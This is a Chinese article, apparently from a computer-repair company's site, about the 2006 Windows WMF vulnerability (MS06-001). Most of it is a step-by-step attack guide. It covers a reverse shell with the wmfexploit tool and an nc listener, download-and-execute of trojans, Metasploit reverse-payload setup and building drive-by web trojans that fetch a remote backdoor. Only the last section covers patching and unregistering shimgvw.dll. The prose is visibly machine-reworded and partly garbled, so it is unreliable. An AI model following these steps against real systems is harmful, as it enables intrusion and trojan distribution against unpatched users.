警惕!由图片引发的溢出危机
就在刚迈入2006年之际,Windows系统出现了一个紧张的漏洞,这便是Microsoft Windows图形渲染引擎wmf款式代码漏洞(ms0601)。这个漏洞出现在Windows的图形渲染引擎中,黑客可以结构恶意的wmf文件,引诱其他用户打开,当系统没有更新过wmf补丁时,将会执行黑客事先设置好的恶意代码,获取系统的最高权限,从而完全服从于黑客。就在漏洞公布几天后,网络上使用wmf漏洞举行流传的病毒、攻击变乱不断,直至今日,网上仍然充斥着有数利用wmf漏洞的攻击。本文将向大家先容有关wmf漏洞的知识及防备方法。
由于wmf漏洞涉及的Windows系统版本很多,包括从Windows 98到Windows 2003之间的全部系统版本,因此危害非常巨大。现在利用wmf漏洞的攻击主要包括两类:1.溢出攻击 2.利用漏洞制造的网页木马。前者可以让黑客得到系统的最高权限,后者则可以将受益者的电脑成为黑客的肉鸡。上面我们先来看看黑客是如何利用wmf漏洞的。
一.使用专用溢出东西
wmf漏洞的溢出东西在漏洞公布的几天后就出现在网上,固然公布工夫较早,存在一些缺陷,但是仍然能轻松得将存在漏洞的主机溢出。这款溢出东西名叫wmfexploit。下载后将其解压到c盘(由于溢出步伐会被杀毒软件以为是病毒,因此测试时需要将杀毒软件关闭),点“开始”→“运转”,输出“CMD”运转“下令提示符”。在“下令提示符”中进入c盘,输出wmfexploit后就可以查看其使用阐明了。其溢出方法有两种:1.反向溢出式 2.自动下载执行式。
1.反向溢出,穿透防火墙
反向溢出的最大好处便是可以穿透防火墙。同时由于wmf漏洞的特别性,我们无法通过漏洞扫描器来确定哪台主机存在漏洞,因此可以使用反向连接,让有漏洞的主机自动连接本机。
在“下令提示符”中运转wmfexploit后,可以查看其反向溢出的使用阐明。其使用方法如下:wmfexploit 1
设置完成后,我们进入“下令提示符”,然后运转闻名的网络东西nc,输出如下下令“nc -vv -l -p 888”,这样nc就开始监听本机的888端口。接着我们就可以引诱目的访问我们的恶意wmf文件了。将网址“http://192.168.0.1:777/any.wmf”发给对方即可。当目的打开这个地址时,就会运转我们捆绑有溢出信息的wmf文件。我们回到用nc监听的窗口,可以看到,目的主机曾经成功溢出了。
提示:上文中提到的IP地址192.168.0.1,属于内网IP,只是方便举行本机测试,如果想对外网的主机举行测试,则需要将本机的内网IP改为外网IP。
2.下载执行,间接运转木马
除反向溢出外,wmfexploit另有一种溢出方法便是下载执行式。当目的主机运转恶意wmf文件发生溢出后,不会将shell发送到本机监听的端口上,而是间接从指定的网址上下载一个exe文件运转,这个文件可以是木马,也可以是其他步伐。当然我们还需要有一个网页空间,用来安排需要执行的exe文件。
查看下载执行式溢出的使用方法:wmfexploit 2
--------------------------------------------------------------------------------
二.使用图形化的溢出测试系统
metasploit是一款闻名的溢出测试系统,险些可以对现在全部的溢出漏洞举行测试,可以说是全部溢出步伐的整合。当然其不是简单得将溢出步伐堆放在一同,而是提供了一个方便操作,针对性强的溢出测试平台。这个测试系统的最大优点是使用了一个完全图形化的操作界面,这对于菜鸟举行溢出测试是很方便的。
下载安装metasploit。完成后点击“开始”,运转步伐组中的“MSFUpdate”,步伐会弹出一个“下令提示符”窗口,显示需要更新的文件列表,输出“yes”回车后就可以开始举行溢出步伐更新。更新完毕后运转“MSFweb”,用于开启本机的metasploi欣赏办事。然后打开欣赏器,在地址栏中输出“http://127.0.0.1:55555”,就可以打开metasploi的操作界面。选择溢出列表中的“Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution”进入漏洞信息界面,然后点击最下方的“0 - Automatic - Windows XP / Windows 2003 / Windows Vista (default)”举行测试,在接着出现的“Select Payload:”选项中选择“win32_reverse”。最后离开溢出相关信息的填写处,在选项中只需设置“HTTPHOST”、“HTTPPORT”、“LHOST”、“LPORT”四项即可,其他保持默许。设置方法和原理与wmfexploit相似,在此不再论述。
同样将恶意wmf文件的地址发给目的,当对方发生溢出后,我们点击进入metasploit界面上的“SESSIONS”就可以得到一个管理员权限的shell了。
提示:在使用metasploi之前务必举行更新,否则很大概没有wmf漏洞相关的测试选项。
三.利用漏洞制造网页木马
wmf漏洞形成的最大影响便是网络上彀页木马满天飞,由于杀毒软件对图片文件的检测功能不敷强大,因此利用wmf漏洞制造的网页木马很容易成功,也成了近来网页木马中的主角。上面我们来相识一下wmf网页木马的制造。
首先我们需要准备一款木马步伐,这里推荐类似灰鸽子的反弹连接型木马,这样当有目的发生溢出时会通过木马自动连接我们的主机,而无需我们自动连接,方便了对肉鸡的管理。然后将设置装备摆设好的木马步伐办事端安排到网页空间上(可请求免费空间举行存放)。
下载wmf木马的制造步伐ms0601。下载完成后在“下令提示符”中运转,可以看到使用方法很简单:ms0601 [THE URL OF EXEFILE],间接输出木马文件地点的网址即可。回车后就可以在同目次下天生一个exploit.wmf文件,运转这个wmf文件将会触发溢出并自动从网页上下载木马文件执行。
将exploit.wmf文件上传到网页空间中。最后我们需要在网站主页的源代码中拔出如下一句代码:。这样当他人访问主页时,将不会弹出新的欣赏器窗口,而是间接运转exploit.wmf举行溢出。
--------------------------------------------------------------------------------
四.填漏洞,防木马
由于wmf漏洞的公布工夫较晚,因此网络上另有很多没有打好补丁的系统。无论是溢出还是网页木马,成功率都很高,这也给病毒和木马的流传提供了途径。在相识了黑客如何利用wmf漏洞后,我们再来看看如何才能填补漏洞,防备利用wmf漏洞的网页木马。
1.反注册dll文件
由于需要使用Windows Picture查看恶意wmf文件时才会触发溢出,因此如果不方便打系统补丁,可以先尝试反注册Windows Picture的dll文件Shimgvw.dll,反注册后Windows Picture将不克不及再运转,溢出也就不存在了。
反注册方法为:点“开始”→“运转”,输出“regsvr32 -u %windir%/system32/shimgvw.dll”即可。如果想恢复使用Windows Picture,可以输出“regsvr32 %windir%/system32/shimgvw.dll”重新注册。
2.使用漏洞补丁
现在微软曾经公布了该漏洞的补丁步伐,下载地址:http://www.microsoft.com/technet/security/Bulletin/MS06-001.mspx,这是最彻底也是最宁静的修补方法。
如果不方便打微软提供的系统补丁,可以推荐使用第三方制造的补丁步伐:
3.鉴戒未知图片文件
如果恶意的wmf文件放在网页空间中,我们在访问这个恶意wmf文件时会产生差别的情况,Win2000主要体现为出现下载提示框,要求下载wmf文件。而WinXP和Win2003则会弹出Windows图片查看器,图片的内容则无法显示。碰到这种情况时,我们就应该警惕了,很有大概这个wmf文件就带有溢出信息。当然不肯定只有wmf为后缀的图片文件才大概触发溢出,其他诸如jpg、bmp等图片款式只要经过结构,同样可以举行溢出。因此我们要对不明图片多加警惕,黑客往往会为恶意图片文件取一个诱人的名字,引诱他人打开。
此外,升级杀毒软件是必需的,最新的杀毒软件病毒库都已将恶意wmf文件列为病毒。
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
